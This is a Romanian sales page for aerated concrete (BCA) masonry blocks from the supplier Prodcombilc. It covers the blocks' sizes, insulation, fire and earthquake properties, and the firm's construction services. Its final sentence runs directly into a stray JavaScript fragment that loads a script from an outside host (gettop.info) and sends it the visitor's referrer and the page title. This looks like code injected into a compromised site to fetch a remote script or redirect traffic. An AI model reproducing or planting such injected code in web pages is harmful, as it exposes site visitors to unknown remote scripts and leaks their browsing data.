blocuri bca

blocuri bcaDomeniul constructiilor este extrem de complex, tehnologiile si materialele utilizate la construirea unor structuri rezidentiale, industriale, comerciale etc fiind din ce in ce mai avansate si specializate. Desigur, odata cu standardele inalte cresc si preturile, insa nu toate materialele au costuri ridicate, in ciuda eficientei acestora. Un astfel de exemplu il reprezinta betonul celular autoclavizat, cunoscut si sub prescurtarea de BCA. Acesta reprezinta o concurenta serioasa pentru celelalte materiale utilizate in constructii, mai exact la zidaria unei structuri.

Prodcombilc va pune la dispozitie blocuri zidarie BCA , disponibil in diverse dimensiuni in functie de nevoile dumneavoastra. Firma noastra si-a inceput activitatea in anul 1992 , aceasta avand ca obiect de activitate distributia si comertul cu materiale de constructii. De asemenea, executam diverse tipuri de  lucrari, datorita experientei de peste 18 ani pe care am dobandit-o prin multa daruire si perfectionare continua.

Asadar, daca ati decis sa va construiti propria locuinta sau doriti sa va amenajati locuinta, noi va oferim solutii personalizate excelente. Mai intai de toate, specialistii nostri va ofera consultanta pentru a putea decide impreuna planul pe care il vor urma angajatii nostri, iar noi ne vom ocupa de transport, executie si restul activitatilor necesare.

Care sunt avantajele acestor blocuri zidarie BCA?

Spre deosebire de materialele de constructie clasice, aceste blocuri zidarie BCA se bucura de anumite caracteristici tehnice, dar si structurale care le ofera anumite avantaje. Acestea pot fi utilizate pentru orice fel de locuinta, indiferent ca este vorba despre un bloc cu mai multe etaje sau o locuinta dispusa pe parter.

Grosimile unui bloc din BCA pot varia intre 50 mm, 75 mm si 125 mm, ceea ce le permite constructorilor sa utilizeze aceste materiale nu doar pentru zidire, ci si pentru izolarea peretilor din exterior. Datorita rezistentei si proprietatilor excelente, aceste blocuri zidarie BCA sunt ideale si pentru izolarea fonica si termica a planseelor.

Din punct de vedere al calitatilor, BCA-ul este un material cu o stabilitate mare, care contribuie sa ridicarea unor cladiri trainice. De asemenea, ingredientele folosite in compozitia acestui material (var, ciment, nisip, apa) sunt ecologice, ceea ce face ca reciclarea acestuia sa fie posibila 100%. Cladirile care au la baza BCA se dovedesc a fi rezistente in fata cutremurelor, datorita greutatii reduse. Desigur, greutatea redusa permite si o manipulare mai facila si mai rapida, adica un termen de executie mai scurt.

Prodcombilc va ofera blocuri zidarie BCA la preturi avantajoase!

De ce sa nu profitati de avantajele acestui material pentru viitoarea dumneavoastra locuinta? In plus, aceste blocuri zidarie BCA nu sunt doar rezistente, ecologice si cu o greutate redusa, ci sunt si foarte economice fata de alte materiale. Blocurile mari si compacte vor face ca executia sa se desfasoare cu rapiditate, fara zile de intarzieri sau costuri suplimentare neprevazute.

Izoleaza fonic si termic, dar va protejeaza si impotriva incendiilor, ceea ce inseamna o locuinta mai sigura si mai durabila. Asadar, pentru a descoperi toate ofertele noastre pe care vi le punem la dispozitie va rugam sa accesati prodcombilc.ro!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;